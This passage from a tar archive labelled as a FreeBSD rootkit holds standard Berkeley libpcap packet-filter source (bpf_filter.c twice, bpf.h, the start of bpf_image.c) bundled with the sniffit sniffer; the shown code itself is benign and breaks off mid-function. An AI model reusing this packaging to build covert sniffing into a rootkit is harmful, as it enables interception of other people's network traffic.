EXTRACT_SHORT(p)\ ((u_short)\ ((u_short)*((u_char *)p+0)<<8|\ (u_short)*((u_char *)p+1)<<0)) #define EXTRACT_LONG(p)\ ((u_int32)*((u_char *)p+0)<<24|\ (u_int32)*((u_char *)p+1)<<16|\ (u_int32)*((u_char *)p+2)<<8|\ (u_int32)*((u_char *)p+3)<<0) #endif #ifdef KERNEL #include #define MINDEX(m, k) \ { \ register int len = m->m_len; \ \ while (k >= len) { \ k -= len; \ m = m->m_next; \ if (m == 0) \ return 0; \ len = m->m_len; \ } \ } static int m_xword(m, k, err) register struct mbuf *m; register int k, *err; { register int len; register u_char *cp, *np; register struct mbuf *m0; len = m->m_len; while (k >= len) { k -= len; m = m->m_next; if (m == 0) goto bad; len = m->m_len; } cp = mtod(m, u_char *) + k; if (len - k >= 4) { *err = 0; return EXTRACT_LONG(cp); } m0 = m->m_next; if (m0 == 0 || m0->m_len + len - k < 4) goto bad; *err = 0; np = mtod(m0, u_char *); switch (len - k) { case 1: return (cp[k] << 24) | (np[0] << 16) | (np[1] << 8) | np[2]; case 2: return (cp[k] << 24) | (cp[k + 1] << 16) | (np[0] << 8) | np[1]; default: return (cp[k] << 24) | (cp[k + 1] << 16) | (cp[k + 2] << 8) | np[0]; } bad: *err = 1; return 0; } static int m_xhalf(m, k, err) register struct mbuf *m; register int k, *err; { register int len; register u_char *cp; register struct mbuf *m0; len = m->m_len; while (k >= len) { k -= len; m = m->m_next; if (m == 0) goto bad; len = m->m_len; } cp = mtod(m, u_char *) + k; if (len - k >= 2) { *err = 0; return EXTRACT_SHORT(cp); } m0 = m->m_next; if (m0 == 0) goto bad; *err = 0; return (cp[k] << 8) | mtod(m0, u_char *)[0]; bad: *err = 1; return 0; } #endif /* * Execute the filter program starting at pc on the packet p * wirelen is the length of the original packet * buflen is the amount of data present */ u_int bpf_filter(pc, p, wirelen, buflen) register struct bpf_insn *pc; register u_char *p; u_int wirelen; register u_int buflen; { register u_int32 A, X; register int k; int32 mem[BPF_MEMWORDS]; if (pc == 0) /* * No filter means accept all. */ return (u_int)-1; #ifdef lint A = 0; X = 0; #endif --pc; while (1) { ++pc; switch (pc->code) { default: #ifdef KERNEL return 0; #else abort(); #endif case BPF_RET|BPF_K: return (u_int)pc->k; case BPF_RET|BPF_A: return (u_int)A; case BPF_LD|BPF_W|BPF_ABS: k = pc->k; if (k + sizeof(int32) > buflen) { #ifdef KERNEL int merr; if (buflen != 0) return 0; A = m_xword((struct mbuf *)p, k, &merr); if (merr != 0) return 0; continue; #else return 0; #endif } A = EXTRACT_LONG(&p[k]); continue; case BPF_LD|BPF_H|BPF_ABS: k = pc->k; if (k + sizeof(short) > buflen) { #ifdef KERNEL int merr; if (buflen != 0) return 0; A = m_xhalf((struct mbuf *)p, k, &merr); continue; #else return 0; #endif } A = EXTRACT_SHORT(&p[k]); continue; case BPF_LD|BPF_B|BPF_ABS: k = pc->k; if (k >= buflen) { #ifdef KERNEL register struct mbuf *m; if (buflen != 0) return 0; m = (struct mbuf *)p; MINDEX(m, k); A = mtod(m, u_char *)[k]; continue; #else return 0; #endif } A = p[k]; continue; case BPF_LD|BPF_W|BPF_LEN: A = wirelen; continue; case BPF_LDX|BPF_W|BPF_LEN: X = wirelen; continue; case BPF_LD|BPF_W|BPF_IND: k = X + pc->k; if (k + sizeof(int32) > buflen) { #ifdef KERNEL int merr; if (buflen != 0) return 0; A = m_xword((struct mbuf *)p, k, &merr); if (merr != 0) return 0; continue; #else return 0; #endif } A = EXTRACT_LONG(&p[k]); continue; case BPF_LD|BPF_H|BPF_IND: k = X + pc->k; if (k + sizeof(short) > buflen) { #ifdef KERNEL int merr; if (buflen != 0) return 0; A = m_xhalf((struct mbuf *)p, k, &merr); if (merr != 0) return 0; continue; #else return 0; #endif } A = EXTRACT_SHORT(&p[k]); continue; case BPF_LD|BPF_B|BPF_IND: k = X + pc->k; if (k >= buflen) { #ifdef KERNEL register struct mbuf *m; if (buflen != 0) return 0; m = (struct mbuf *)p; MINDEX(m, k); A = mtod(m, char *)[k]; continue; #else return 0; #endif } A = p[k]; continue; case BPF_LDX|BPF_MSH|BPF_B: k = pc->k; if (k >= buflen) { #ifdef KERNEL register struct mbuf *m; if (buflen != 0) return 0; m = (struct mbuf *)p; MINDEX(m, k); X = (mtod(m, char *)[k] & 0xf) << 2; continue; #else return 0; #endif } X = (p[pc->k] & 0xf) << 2; continue; case BPF_LD|BPF_IMM: A = pc->k; continue; case BPF_LDX|BPF_IMM: X = pc->k; continue; case BPF_LD|BPF_MEM: A = mem[pc->k]; continue; case BPF_LDX|BPF_MEM: X = mem[pc->k]; continue; case BPF_ST: mem[pc->k] = A; continue; case BPF_STX: mem[pc->k] = X; continue; case BPF_JMP|BPF_JA: pc += pc->k; continue; case BPF_JMP|BPF_JGT|BPF_K: pc += (A > pc->k) ? pc->jt : pc->jf; continue; case BPF_JMP|BPF_JGE|BPF_K: pc += (A >= pc->k) ? pc->jt : pc->jf; continue; case BPF_JMP|BPF_JEQ|BPF_K: pc += (A == pc->k) ? pc->jt : pc->jf; continue; case BPF_JMP|BPF_JSET|BPF_K: pc += (A & pc->k) ? pc->jt : pc->jf; continue; case BPF_JMP|BPF_JGT|BPF_X: pc += (A > X) ? pc->jt : pc->jf; continue; case BPF_JMP|BPF_JGE|BPF_X: pc += (A >= X) ? pc->jt : pc->jf; continue; case BPF_JMP|BPF_JEQ|BPF_X: pc += (A == X) ? pc->jt : pc->jf; continue; case BPF_JMP|BPF_JSET|BPF_X: pc += (A & X) ? pc->jt : pc->jf; continue; case BPF_ALU|BPF_ADD|BPF_X: A += X; continue; case BPF_ALU|BPF_SUB|BPF_X: A -= X; continue; case BPF_ALU|BPF_MUL|BPF_X: A *= X; continue; case BPF_ALU|BPF_DIV|BPF_X: if (X == 0) return 0; A /= X; continue; case BPF_ALU|BPF_AND|BPF_X: A &= X; continue; case BPF_ALU|BPF_OR|BPF_X: A |= X; continue; case BPF_ALU|BPF_LSH|BPF_X: A <<= X; continue; case BPF_ALU|BPF_RSH|BPF_X: A >>= X; continue; case BPF_ALU|BPF_ADD|BPF_K: A += pc->k; continue; case BPF_ALU|BPF_SUB|BPF_K: A -= pc->k; continue; case BPF_ALU|BPF_MUL|BPF_K: A *= pc->k; continue; case BPF_ALU|BPF_DIV|BPF_K: A /= pc->k; continue; case BPF_ALU|BPF_AND|BPF_K: A &= pc->k; continue; case BPF_ALU|BPF_OR|BPF_K: A |= pc->k; continue; case BPF_ALU|BPF_LSH|BPF_K: A <<= pc->k; continue; case BPF_ALU|BPF_RSH|BPF_K: A >>= pc->k; continue; case BPF_ALU|BPF_NEG: A = -A; continue; case BPF_MISC|BPF_TAX: X = A; continue; case BPF_MISC|BPF_TXA: A = X; continue; } } } #ifdef KERNEL /* * Return true if the 'fcode' is a valid filter program. * The constraints are that each jump be forward and to a valid * code. The code must terminate with either an accept or reject. * 'valid' is an array for use by the routine (it must be at least * 'len' bytes long). * * The kernel needs to be able to verify an application's filter code. * Otherwise, a bogus program could easily crash the system. */ int bpf_validate(f, len) struct bpf_insn *f; int len; { register int i; register struct bpf_insn *p; for (i = 0; i < len; ++i) { /* * Check that that jumps are forward, and within * the code block. */ p = &f[i]; if (BPF_CLASS(p->code) == BPF_JMP) { register int from = i + 1; if (BPF_OP(p->code) == BPF_JA) { if (from + p->k >= len) return 0; } else if (from + p->jt >= len || from + p->jf >= len) return 0; } /* * Check that memory operations use valid addresses. */ if ((BPF_CLASS(p->code) == BPF_ST || (BPF_CLASS(p->code) == BPF_LD && (p->code & 0xe0) == BPF_MEM)) && (p->k >= BPF_MEMWORDS || p->k < 0)) return 0; /* * Check for constant division by 0. */ if (p->code == (BPF_ALU|BPF_DIV|BPF_K) && p->k == 0) return 0; } return BPF_CLASS(f[len - 1].code) == BPF_RET; } #endif fbsdrootkit-1.2/sniffit.0.3.3/libpcap/bpf/net/bpf.h100600 764 764 17465 6226213210 17153 0ustar dfdf/*- * Copyright (c) 1990-1991 The Regents of the University of California. * All rights reserved. * * This code is derived from the Stanford/CMU enet packet filter, * (net/enet.c) distributed as part of 4.3BSD, and code contributed * to Berkeley by Steven McCanne and Van Jacobson both of Lawrence * Berkeley Laboratory. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * @(#)bpf.h 7.1 (Berkeley) 5/7/91 * * @(#) $Header: bpf.h,v 1.28 93/12/11 00:49:46 mccanne Locked $ (LBL) */ #ifndef BPF_MAJOR_VERSION /* BSD style release date */ #define BPF_RELEASE 199406 #if defined(__alpha) typedef int bpf_int32; typedef u_int bpf_u_int32; #else typedef long bpf_int32; typedef u_long bpf_u_int32; #endif /* * Alignment macros. BPF_WORDALIGN rounds up to the next * even multiple of BPF_ALIGNMENT. */ #define BPF_ALIGNMENT sizeof(long) #define BPF_WORDALIGN(x) (((x)+(BPF_ALIGNMENT-1))&~(BPF_ALIGNMENT-1)) #define BPF_MAXINSNS 512 #define BPF_MAXBUFSIZE 0x8000 #define BPF_MINBUFSIZE 32 /* * Structure for BIOCSETF. */ struct bpf_program { u_int bf_len; struct bpf_insn *bf_insns; }; /* * Struct returned by BIOCGSTATS. */ struct bpf_stat { u_int bs_recv; /* number of packets received */ u_int bs_drop; /* number of packets dropped */ }; /* * Struct return by BIOCVERSION. This represents the version number of * the filter language described by the instruction encodings below. * bpf understands a program iff kernel_major == filter_major && * kernel_minor >= filter_minor, that is, if the value returned by the * running kernel has the same major number and a minor number equal * equal to or less than the filter being downloaded. Otherwise, the * results are undefined, meaning an error may be returned or packets * may be accepted haphazardly. * It has nothing to do with the source code version. */ struct bpf_version { u_short bv_major; u_short bv_minor; }; /* Current version number of filter architecture. */ #define BPF_MAJOR_VERSION 1 #define BPF_MINOR_VERSION 1 /* * BPF ioctls * * The first set is for compatibility with Sun's pcc style * header files. If your using gcc, we assume that you * have run fixincludes so the latter set should work. */ #if (defined(sun) || defined(ibm032)) && !defined(__GNUC__) #define BIOCGBLEN _IOR(B,102, u_int) #define BIOCSBLEN _IOWR(B,102, u_int) #define BIOCSETF _IOW(B,103, struct bpf_program) #define BIOCFLUSH _IO(B,104) #define BIOCPROMISC _IO(B,105) #define BIOCGDLT _IOR(B,106, u_int) #define BIOCGETIF _IOR(B,107, struct ifreq) #define BIOCSETIF _IOW(B,108, struct ifreq) #define BIOCSRTIMEOUT _IOW(B,109, struct timeval) #define BIOCGRTIMEOUT _IOR(B,110, struct timeval) #define BIOCGSTATS _IOR(B,111, struct bpf_stat) #define BIOCIMMEDIATE _IOW(B,112, u_int) #define BIOCVERSION _IOR(B,113, struct bpf_version) #else #define BIOCGBLEN _IOR('B',102, u_int) #define BIOCSBLEN _IOWR('B',102, u_int) #define BIOCSETF _IOW('B',103, struct bpf_program) #define BIOCFLUSH _IO('B',104) #define BIOCPROMISC _IO('B',105) #define BIOCGDLT _IOR('B',106, u_int) #define BIOCGETIF _IOR('B',107, struct ifreq) #define BIOCSETIF _IOW('B',108, struct ifreq) #define BIOCSRTIMEOUT _IOW('B',109, struct timeval) #define BIOCGRTIMEOUT _IOR('B',110, struct timeval) #define BIOCGSTATS _IOR('B',111, struct bpf_stat) #define BIOCIMMEDIATE _IOW('B',112, u_int) #define BIOCVERSION _IOR('B',113, struct bpf_version) #endif /* * Structure prepended to each packet. */ struct bpf_hdr { struct timeval bh_tstamp; /* time stamp */ bpf_u_int32 bh_caplen; /* length of captured portion */ bpf_u_int32 bh_datalen; /* original length of packet */ u_short bh_hdrlen; /* length of bpf header (this struct plus alignment padding) */ }; /* * Because the structure above is not a multiple of 4 bytes, some compilers * will insist on inserting padding; hence, sizeof(struct bpf_hdr) won't work. * Only the kernel needs to know about it; applications use bh_hdrlen. */ #ifdef KERNEL #define SIZEOF_BPF_HDR 18 #endif /* * Data-link level type codes. */ #define DLT_NULL 0 /* no link-layer encapsulation */ #define DLT_EN10MB 1 /* Ethernet (10Mb) */ #define DLT_EN3MB 2 /* Experimental Ethernet (3Mb) */ #define DLT_AX25 3 /* Amateur Radio AX.25 */ #define DLT_PRONET 4 /* Proteon ProNET Token Ring */ #define DLT_CHAOS 5 /* Chaos */ #define DLT_IEEE802 6 /* IEEE 802 Networks */ #define DLT_ARCNET 7 /* ARCNET */ #define DLT_SLIP 8 /* Serial Line IP */ #define DLT_PPP 9 /* Point-to-point Protocol */ #define DLT_FDDI 10 /* FDDI */ /* * The instruction encondings. */ /* instruction classes */ #define BPF_CLASS(code) ((code) & 0x07) #define BPF_LD 0x00 #define BPF_LDX 0x01 #define BPF_ST 0x02 #define BPF_STX 0x03 #define BPF_ALU 0x04 #define BPF_JMP 0x05 #define BPF_RET 0x06 #define BPF_MISC 0x07 /* ld/ldx fields */ #define BPF_SIZE(code) ((code) & 0x18) #define BPF_W 0x00 #define BPF_H 0x08 #define BPF_B 0x10 #define BPF_MODE(code) ((code) & 0xe0) #define BPF_IMM 0x00 #define BPF_ABS 0x20 #define BPF_IND 0x40 #define BPF_MEM 0x60 #define BPF_LEN 0x80 #define BPF_MSH 0xa0 /* alu/jmp fields */ #define BPF_OP(code) ((code) & 0xf0) #define BPF_ADD 0x00 #define BPF_SUB 0x10 #define BPF_MUL 0x20 #define BPF_DIV 0x30 #define BPF_OR 0x40 #define BPF_AND 0x50 #define BPF_LSH 0x60 #define BPF_RSH 0x70 #define BPF_NEG 0x80 #define BPF_JA 0x00 #define BPF_JEQ 0x10 #define BPF_JGT 0x20 #define BPF_JGE 0x30 #define BPF_JSET 0x40 #define BPF_SRC(code) ((code) & 0x08) #define BPF_K 0x00 #define BPF_X 0x08 /* ret - BPF_K and BPF_X also apply */ #define BPF_RVAL(code) ((code) & 0x18) #define BPF_A 0x10 /* misc */ #define BPF_MISCOP(code) ((code) & 0xf8) #define BPF_TAX 0x00 #define BPF_TXA 0x80 /* * The instruction data structure. */ struct bpf_insn { u_short code; u_char jt; u_char jf; bpf_int32 k; }; /* * Macros for insn array initializers. */ #define BPF_STMT(code, k) { (u_short)(code), 0, 0, k } #define BPF_JUMP(code, k, jt, jf) { (u_short)(code), jt, jf, k } #ifdef KERNEL extern u_int bpf_filter(); extern void bpfattach(); extern void bpf_tap(); extern void bpf_mtap(); #endif /* * Number of scratch memory words (for BPF_LD|BPF_MEM and BPF_ST). */ #define BPF_MEMWORDS 16 #endif fbsdrootkit-1.2/sniffit.0.3.3/libpcap/bpf_filter.c100400 764 764 25354 6226213210 17150 0ustar dfdf/*- * Copyright (c) 1990, 1991, 1992, 1993 * The Regents of the University of California. All rights reserved. * * This code is derived from the Stanford/CMU enet packet filter, * (net/enet.c) distributed as part of 4.3BSD, and code contributed * to Berkeley by Steven McCanne and Van Jacobson both of Lawrence * Berkeley Laboratory. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * @(#)bpf.c 7.5 (Berkeley) 7/15/91 * * static char rcsid[] = * "$Header: bpf_filter.c,v 1.22 94/06/05 20:12:39 leres Exp $"; */ #if !(defined(lint) || defined(KERNEL)) static char rcsid[] = "@(#) $Header: bpf_filter.c,v 1.22 94/06/05 20:12:39 leres Exp $ (LBL)"; #endif #include #include #include #include #if defined(__alpha) typedef int int32; typedef u_int u_int32; #else typedef long int32; typedef u_long u_int32; #endif #ifdef sun #include #endif #if defined(sparc) || defined(mips) || defined(ibm032) || defined(__alpha) #define BPF_ALIGN #endif #ifndef BPF_ALIGN #define EXTRACT_SHORT(p) ((u_short)ntohs(*(u_short *)p)) #define EXTRACT_LONG(p) (ntohl(*(u_int32 *)p)) #else #define EXTRACT_SHORT(p)\ ((u_short)\ ((u_short)*((u_char *)p+0)<<8|\ (u_short)*((u_char *)p+1)<<0)) #define EXTRACT_LONG(p)\ ((u_int32)*((u_char *)p+0)<<24|\ (u_int32)*((u_char *)p+1)<<16|\ (u_int32)*((u_char *)p+2)<<8|\ (u_int32)*((u_char *)p+3)<<0) #endif #ifdef KERNEL #include #define MINDEX(m, k) \ { \ register int len = m->m_len; \ \ while (k >= len) { \ k -= len; \ m = m->m_next; \ if (m == 0) \ return 0; \ len = m->m_len; \ } \ } static int m_xword(m, k, err) register struct mbuf *m; register int k, *err; { register int len; register u_char *cp, *np; register struct mbuf *m0; len = m->m_len; while (k >= len) { k -= len; m = m->m_next; if (m == 0) goto bad; len = m->m_len; } cp = mtod(m, u_char *) + k; if (len - k >= 4) { *err = 0; return EXTRACT_LONG(cp); } m0 = m->m_next; if (m0 == 0 || m0->m_len + len - k < 4) goto bad; *err = 0; np = mtod(m0, u_char *); switch (len - k) { case 1: return (cp[k] << 24) | (np[0] << 16) | (np[1] << 8) | np[2]; case 2: return (cp[k] << 24) | (cp[k + 1] << 16) | (np[0] << 8) | np[1]; default: return (cp[k] << 24) | (cp[k + 1] << 16) | (cp[k + 2] << 8) | np[0]; } bad: *err = 1; return 0; } static int m_xhalf(m, k, err) register struct mbuf *m; register int k, *err; { register int len; register u_char *cp; register struct mbuf *m0; len = m->m_len; while (k >= len) { k -= len; m = m->m_next; if (m == 0) goto bad; len = m->m_len; } cp = mtod(m, u_char *) + k; if (len - k >= 2) { *err = 0; return EXTRACT_SHORT(cp); } m0 = m->m_next; if (m0 == 0) goto bad; *err = 0; return (cp[k] << 8) | mtod(m0, u_char *)[0]; bad: *err = 1; return 0; } #endif /* * Execute the filter program starting at pc on the packet p * wirelen is the length of the original packet * buflen is the amount of data present */ u_int bpf_filter(pc, p, wirelen, buflen) register struct bpf_insn *pc; register u_char *p; u_int wirelen; register u_int buflen; { register u_int32 A, X; register int k; int32 mem[BPF_MEMWORDS]; if (pc == 0) /* * No filter means accept all. */ return (u_int)-1; #ifdef lint A = 0; X = 0; #endif --pc; while (1) { ++pc; switch (pc->code) { default: #ifdef KERNEL return 0; #else abort(); #endif case BPF_RET|BPF_K: return (u_int)pc->k; case BPF_RET|BPF_A: return (u_int)A; case BPF_LD|BPF_W|BPF_ABS: k = pc->k; if (k + sizeof(int32) > buflen) { #ifdef KERNEL int merr; if (buflen != 0) return 0; A = m_xword((struct mbuf *)p, k, &merr); if (merr != 0) return 0; continue; #else return 0; #endif } A = EXTRACT_LONG(&p[k]); continue; case BPF_LD|BPF_H|BPF_ABS: k = pc->k; if (k + sizeof(short) > buflen) { #ifdef KERNEL int merr; if (buflen != 0) return 0; A = m_xhalf((struct mbuf *)p, k, &merr); continue; #else return 0; #endif } A = EXTRACT_SHORT(&p[k]); continue; case BPF_LD|BPF_B|BPF_ABS: k = pc->k; if (k >= buflen) { #ifdef KERNEL register struct mbuf *m; if (buflen != 0) return 0; m = (struct mbuf *)p; MINDEX(m, k); A = mtod(m, u_char *)[k]; continue; #else return 0; #endif } A = p[k]; continue; case BPF_LD|BPF_W|BPF_LEN: A = wirelen; continue; case BPF_LDX|BPF_W|BPF_LEN: X = wirelen; continue; case BPF_LD|BPF_W|BPF_IND: k = X + pc->k; if (k + sizeof(int32) > buflen) { #ifdef KERNEL int merr; if (buflen != 0) return 0; A = m_xword((struct mbuf *)p, k, &merr); if (merr != 0) return 0; continue; #else return 0; #endif } A = EXTRACT_LONG(&p[k]); continue; case BPF_LD|BPF_H|BPF_IND: k = X + pc->k; if (k + sizeof(short) > buflen) { #ifdef KERNEL int merr; if (buflen != 0) return 0; A = m_xhalf((struct mbuf *)p, k, &merr); if (merr != 0) return 0; continue; #else return 0; #endif } A = EXTRACT_SHORT(&p[k]); continue; case BPF_LD|BPF_B|BPF_IND: k = X + pc->k; if (k >= buflen) { #ifdef KERNEL register struct mbuf *m; if (buflen != 0) return 0; m = (struct mbuf *)p; MINDEX(m, k); A = mtod(m, char *)[k]; continue; #else return 0; #endif } A = p[k]; continue; case BPF_LDX|BPF_MSH|BPF_B: k = pc->k; if (k >= buflen) { #ifdef KERNEL register struct mbuf *m; if (buflen != 0) return 0; m = (struct mbuf *)p; MINDEX(m, k); X = (mtod(m, char *)[k] & 0xf) << 2; continue; #else return 0; #endif } X = (p[pc->k] & 0xf) << 2; continue; case BPF_LD|BPF_IMM: A = pc->k; continue; case BPF_LDX|BPF_IMM: X = pc->k; continue; case BPF_LD|BPF_MEM: A = mem[pc->k]; continue; case BPF_LDX|BPF_MEM: X = mem[pc->k]; continue; case BPF_ST: mem[pc->k] = A; continue; case BPF_STX: mem[pc->k] = X; continue; case BPF_JMP|BPF_JA: pc += pc->k; continue; case BPF_JMP|BPF_JGT|BPF_K: pc += (A > pc->k) ? pc->jt : pc->jf; continue; case BPF_JMP|BPF_JGE|BPF_K: pc += (A >= pc->k) ? pc->jt : pc->jf; continue; case BPF_JMP|BPF_JEQ|BPF_K: pc += (A == pc->k) ? pc->jt : pc->jf; continue; case BPF_JMP|BPF_JSET|BPF_K: pc += (A & pc->k) ? pc->jt : pc->jf; continue; case BPF_JMP|BPF_JGT|BPF_X: pc += (A > X) ? pc->jt : pc->jf; continue; case BPF_JMP|BPF_JGE|BPF_X: pc += (A >= X) ? pc->jt : pc->jf; continue; case BPF_JMP|BPF_JEQ|BPF_X: pc += (A == X) ? pc->jt : pc->jf; continue; case BPF_JMP|BPF_JSET|BPF_X: pc += (A & X) ? pc->jt : pc->jf; continue; case BPF_ALU|BPF_ADD|BPF_X: A += X; continue; case BPF_ALU|BPF_SUB|BPF_X: A -= X; continue; case BPF_ALU|BPF_MUL|BPF_X: A *= X; continue; case BPF_ALU|BPF_DIV|BPF_X: if (X == 0) return 0; A /= X; continue; case BPF_ALU|BPF_AND|BPF_X: A &= X; continue; case BPF_ALU|BPF_OR|BPF_X: A |= X; continue; case BPF_ALU|BPF_LSH|BPF_X: A <<= X; continue; case BPF_ALU|BPF_RSH|BPF_X: A >>= X; continue; case BPF_ALU|BPF_ADD|BPF_K: A += pc->k; continue; case BPF_ALU|BPF_SUB|BPF_K: A -= pc->k; continue; case BPF_ALU|BPF_MUL|BPF_K: A *= pc->k; continue; case BPF_ALU|BPF_DIV|BPF_K: A /= pc->k; continue; case BPF_ALU|BPF_AND|BPF_K: A &= pc->k; continue; case BPF_ALU|BPF_OR|BPF_K: A |= pc->k; continue; case BPF_ALU|BPF_LSH|BPF_K: A <<= pc->k; continue; case BPF_ALU|BPF_RSH|BPF_K: A >>= pc->k; continue; case BPF_ALU|BPF_NEG: A = -A; continue; case BPF_MISC|BPF_TAX: X = A; continue; case BPF_MISC|BPF_TXA: A = X; continue; } } } #ifdef KERNEL /* * Return true if the 'fcode' is a valid filter program. * The constraints are that each jump be forward and to a valid * code. The code must terminate with either an accept or reject. * 'valid' is an array for use by the routine (it must be at least * 'len' bytes long). * * The kernel needs to be able to verify an application's filter code. * Otherwise, a bogus program could easily crash the system. */ int bpf_validate(f, len) struct bpf_insn *f; int len; { register int i; register struct bpf_insn *p; for (i = 0; i < len; ++i) { /* * Check that that jumps are forward, and within * the code block. */ p = &f[i]; if (BPF_CLASS(p->code) == BPF_JMP) { register int from = i + 1; if (BPF_OP(p->code) == BPF_JA) { if (from + p->k >= len) return 0; } else if (from + p->jt >= len || from + p->jf >= len) return 0; } /* * Check that memory operations use valid addresses. */ if ((BPF_CLASS(p->code) == BPF_ST || (BPF_CLASS(p->code) == BPF_LD && (p->code & 0xe0) == BPF_MEM)) && (p->k >= BPF_MEMWORDS || p->k < 0)) return 0; /* * Check for constant division by 0. */ if (p->code == (BPF_ALU|BPF_DIV|BPF_K) && p->k == 0) return 0; } return BPF_CLASS(f[len - 1].code) == BPF_RET; } #endif fbsdrootkit-1.2/sniffit.0.3.3/libpcap/bpf_image.c100400 764 764 11346 6226213210 16741 0ustar dfdf/* * Copyright (c) 1990, 1991, 1992, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that: (1) source code distributions * retain the above copyright notice and this paragraph in its entirety, (2) * distributions including binary code include the above copyright notice and * this paragraph in its entirety in the documentation or other materials * provided with the distribution, and (3) all advertising materials mentioning * features or use of this software display the following acknowledgement: * ``This product includes software developed by the University of California, * Lawrence Berkeley Laboratory and its contributors.'' Neither the name of * the University nor the names of its contributors may be used to endorse * or promote products derived from this software without specific prior * written permission. * THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR IMPLIED * WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. */ #ifndef lint static char rcsid[] = "@(#) $Header: bpf_image.c,v 1.12 94/01/31 03:22:34 leres Exp $ (LBL)"; #endif #include #include #include #include #include #include char * bpf_image(p, n) struct bpf_insn *p; int n; { int v; char *fmt, *op; static char image[256]; char operand[64]; v = p->k; switch (p->code) { default: op = "unimp"; fmt = "0x%x"; v = p->code; break; case BPF_RET|BPF_K: op = "ret"; fmt = "#%d"; break; case BPF_RET|BPF_A: op = "ret"; fmt = ""; break; case BPF_LD|BPF_W|BPF_ABS: op = "ld"; fmt = "[%d]"; break; case BPF_LD|BPF_H|BPF_ABS: op = "ldh"; fmt = "[%d]"; break; case BPF_LD|BPF_B|BPF_ABS: op = "ldb"; fmt = "[%d]"; break; case BPF_LD|BPF_W|BPF_LEN: op = "ld"; fmt = "#pktlen"; break; case BPF_LD|BPF_W|BPF_IND: op = "ld"; fmt = "[x + %d]"; break; case BPF_LD|BPF_H|BPF_IND: op = "ldh"; fmt = "[x + %d]"; break; case BPF_LD|BPF_B|BPF_IND: op = "ldb"; fmt = "[x + %d]"; break; case BPF_LD|BPF_IMM: op = "ld"; fmt = "#0x%x"; break; case BPF_LDX|BPF_IMM: op = "ldx"; fmt = "#0x%x"; break; case BPF_LDX|BPF_MSH|BPF_B: op = "ldxb"; fmt = "4*([%d]&0xf)"; break; case BPF_LD|BPF_MEM: op = "ld"; fmt = "M[%d]"; break; case BPF_LDX|BPF_MEM: op = "ldx"; fmt = "M[%d]"; break; case BPF_ST: op = "st"; fmt = "M[%d]"; break; case BPF_STX: op = "stx"; fmt = "M[%d]"; break; case BPF_JMP|BPF_JA: op = "ja"; fmt = "%d"; v = n + p->k; break; case BPF_JMP|BPF_JGT|BPF_K: op = "jgt"; fmt = "#0x%x"; break; case BPF_JMP|BPF_JGE|BPF_K: op = "jge"; fmt = "#0x%x"; break; case BPF_JMP|BPF_JEQ|BPF_K: op = "jeq"; fmt = "#0x%x"; break; case BPF_JMP|BPF_JSET|BPF_K: op = "jset"; fmt = "#0x%x"; break; case BPF_JMP|BPF_JGT|BPF_X: op = "jgt"; fmt = "x"; break; case BPF_JMP|BPF_JGE|BPF_X: op = "jge"; fmt = "x"; break; case BPF_JMP|BPF_JEQ|BPF_X: op = "jeq"; fmt = "x"; break; case BPF_JMP|BPF_JSET|BPF_X: op = "jset"; fmt = "x"; break; case BPF_ALU|BPF_ADD|BPF_X: op = "add"; fmt = "x"; break; case BPF_ALU|BPF_SUB|BPF_X: op = "sub"; fmt = "x"; break; case 